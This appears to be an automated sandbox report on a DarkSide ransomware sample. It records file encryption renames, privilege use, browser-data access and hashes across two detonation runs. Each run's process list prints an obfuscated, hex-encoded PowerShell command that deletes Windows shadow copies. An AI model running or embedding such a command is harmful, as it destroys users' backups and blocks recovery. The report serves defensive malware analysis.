Malware Analysis Report

2024-10-16 03:28

Sample ID 220124-as4xlsgfhn
Target ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2
SHA256 ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2
Tags
upx darkside ransomware spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2

Threat Level: Known bad

The file ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2 was found to be: Known bad.

Malicious Activity Summary

upx darkside ransomware spyware stealer

DarkSide

UPX packed file

Modifies extensions of user files

Reads user/profile data of web browsers

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-24 00:29

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-24 00:29

Reported

2022-01-24 00:33

Platform

win7-en-20211208

Max time kernel

121s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe"

Signatures

DarkSide

ransomware darkside

Modifies extensions of user files

ransomware
Description Indicator Process Target
File opened for modification C:\Users\Admin\Pictures\ShowGrant.tiff C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File renamed C:\Users\Admin\Pictures\ShowGrant.tiff => C:\Users\Admin\Pictures\ShowGrant.tiff.5f7aa573 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\StopSet.tiff C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\UnblockExit.tif.5f7aa573 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File renamed C:\Users\Admin\Pictures\MountGrant.raw => C:\Users\Admin\Pictures\MountGrant.raw.5f7aa573 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\ShowGrant.tiff.5f7aa573 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\MountGrant.raw.5f7aa573 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File renamed C:\Users\Admin\Pictures\PushUnregister.raw => C:\Users\Admin\Pictures\PushUnregister.raw.5f7aa573 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\UpdateGet.tiff C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File renamed C:\Users\Admin\Pictures\UpdateGet.tiff => C:\Users\Admin\Pictures\UpdateGet.tiff.5f7aa573 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File renamed C:\Users\Admin\Pictures\UnblockExit.tif => C:\Users\Admin\Pictures\UnblockExit.tif.5f7aa573 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\UpdateGet.tiff.5f7aa573 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File renamed C:\Users\Admin\Pictures\ExpandGet.png => C:\Users\Admin\Pictures\ExpandGet.png.5f7aa573 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\ExpandGet.png.5f7aa573 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\PushUnregister.raw.5f7aa573 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File renamed C:\Users\Admin\Pictures\StopSet.tiff => C:\Users\Admin\Pictures\StopSet.tiff.5f7aa573 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\StopSet.tiff.5f7aa573 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A

Reads user/profile data of web browsers

spyware stealer

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe

"C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

N/A

Files

memory/1552-54-0x0000000075601000-0x0000000075603000-memory.dmp

memory/1696-55-0x000007FEFB771000-0x000007FEFB773000-memory.dmp

memory/1696-58-0x00000000027F2000-0x00000000027F4000-memory.dmp

memory/1696-57-0x00000000027F0000-0x00000000027F2000-memory.dmp

memory/1696-59-0x00000000027F4000-0x00000000027F7000-memory.dmp

memory/1696-56-0x000007FEF29D0000-0x000007FEF352D000-memory.dmp

memory/1696-60-0x000000001B6E0000-0x000000001B9DF000-memory.dmp

memory/1696-61-0x00000000027FB000-0x000000000281A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 a55d404d2972c77172e51b976db41eb5
SHA1 ebe4d7d5f11f2452aca4af51776c92c18ca70030
SHA256 c2a013beaa4cac7ef2bbc64348dc39323f7ba8c86cd82fbe1b7b34de4455c721
SHA512 43b898bd5c6b638756586db82d645e87d882dfbc2c6130012aa2c623e17f3a8fb24ef69b57d134e1f54f4dbcac20053424365955ff6da1f437e4548a2cc6f14d

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-24 00:29

Reported

2022-01-24 00:33

Platform

win10-en-20211208

Max time kernel

122s

Max time network

140s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe"

Signatures

DarkSide

ransomware darkside

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\AssertRedo.raw => C:\Users\Admin\Pictures\AssertRedo.raw.e6bf91d8 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\AssertRedo.raw.e6bf91d8 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File renamed C:\Users\Admin\Pictures\UseCompare.png => C:\Users\Admin\Pictures\UseCompare.png.e6bf91d8 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\UseCompare.png.e6bf91d8 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\ExitResume.raw.e6bf91d8 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\LimitGrant.crw.e6bf91d8 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File renamed C:\Users\Admin\Pictures\RegisterSwitch.crw => C:\Users\Admin\Pictures\RegisterSwitch.crw.e6bf91d8 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\RegisterSwitch.crw.e6bf91d8 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\BlockMount.tiff C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File renamed C:\Users\Admin\Pictures\BlockMount.tiff => C:\Users\Admin\Pictures\BlockMount.tiff.e6bf91d8 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File renamed C:\Users\Admin\Pictures\LimitGrant.crw => C:\Users\Admin\Pictures\LimitGrant.crw.e6bf91d8 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\BlockMount.tiff.e6bf91d8 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File renamed C:\Users\Admin\Pictures\ConvertFromInvoke.png => C:\Users\Admin\Pictures\ConvertFromInvoke.png.e6bf91d8 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File opened for modification C:\Users\Admin\Pictures\ConvertFromInvoke.png.e6bf91d8 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
File renamed C:\Users\Admin\Pictures\ExitResume.raw => C:\Users\Admin\Pictures\ExitResume.raw.e6bf91d8 C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A

Reads user/profile data of web browsers

spyware stealer

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: 36 N/A C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe

"C:\Users\Admin\AppData\Local\Temp\ba57e3301a4fe3b136f3126dc717b55c40b1e6a3ef9f951b9b85ede731d61de2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
NL 104.80.224.57:443 tcp

Files

memory/3824-121-0x000001EE562F0000-0x000001EE56312000-memory.dmp

memory/3824-124-0x000001EE564F0000-0x000001EE56566000-memory.dmp

memory/3824-141-0x000001EE3E1F0000-0x000001EE56370000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ea6243fdb2bfcca2211884b0a21a0afc
SHA1 2eee5232ca6acc33c3e7de03900e890f4adf0f2f
SHA256 5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
SHA512 189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5be7815b906bb543891425997ac1f096
SHA1 596d6d0bc1d75bbe360aa154b1e61389eacaad1b
SHA256 9005ab6429d6b7277a6eb71da0d99cd2cfe11de1e513e331adda1885636f943e
SHA512 25ae960ab6a87c029784c3cd6413995aa2217a82c0d6a1b198553cd75a2088bc1f56d05bf8981260f5a3449f94a2057d51889f7d15c41f0b5a4170a22ef5d037

memory/3824-145-0x000001EE3E1F0000-0x000001EE56370000-memory.dmp